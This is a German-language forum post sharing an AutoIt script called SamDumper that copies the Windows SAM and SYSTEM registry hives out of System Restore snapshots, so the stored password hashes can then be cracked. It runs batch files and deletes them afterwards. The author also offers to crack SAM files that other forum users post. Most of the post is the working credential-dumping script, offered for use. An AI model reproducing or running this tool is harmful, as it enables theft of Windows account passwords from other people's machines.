Dieses kleine tool kopiert die SAM durch eine Schwachstelle von Microsoft.
In der SAM sind alle W$ passwörter gespeichert, man muss sie nurnoch decrypten (Goooogle
Bugfix und ich habes gemeinsam dran gebastelt, also heißt der autor:
Buggy oder
Hugfix
hier das Script:
[autoit]; SamDumper V. 2.0 by Buggy (Huggy + Bugfix)
#include <Array.au3>
#include <File.au3>
#include <Process.au3>
Dim $arZahl[1], $array, $var, $max, $Pfad
$arZahl[0] = ''
$array = _FileListToArray("C:\system~1\_resto~1\","*", 2)
For $i = 1 To $array[0]
$var = StringSplit($array[$i], "P")
If $arZahl[0] = '' Then
$arZahl[0] = Number($var[2])
Else
_ArrayAdd($arZahl, $var[2])
EndIf
Next
$max = _ArrayMax($arZahl, 1)
$Pfad = "C:\system~1\_resto~1\RP" & $max
$SAM = $pfad & "\snapshot"
SplashTextOn("Running...", "SamDumper (V 2.0) is running...wait plz", 500,100)
FileWrite($SAM & "\run.bat", "@echo off" & @Crlf & "copy _REGISTRY_MACHINE_SAM SAM.txt")
FileWrite($SAM & "\run2.bat", "@echo off" & @Crlf & "copy _REGISTRY_MACHINE_SYSTEM System.txt")
Run($SAM & "\run.bat", $SAM)
sleep(1000)
Run($SAM & "\run2.bat", $SAM)
sleep(2000)
FileCopy($SAM & "\SAM.txt", @ScriptDir & "\SAM.txt")
FileCopy($SAM & "\System.txt", @ScriptDir & "\System.txt")
SplashOff()
[/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit]FileDelete($SAM & "\run.bat")
sleep(200)
FileDelete($SAM & "\run2.bat")
ich hoffe, dass das Script nicht unsachgemäß genutzt wird...
Wenn ihr aktiv @ forum seid, würd ich mich bereitstellen eure SAM zu decrypten - so könnt ihr auch rausfinden, ob euer PW sicher ist.
dazu einfach die SAM.txt posten und sagen, welcher benutzer decrypted werden soll
mfg
Buggy (arghs, dieser Name^^)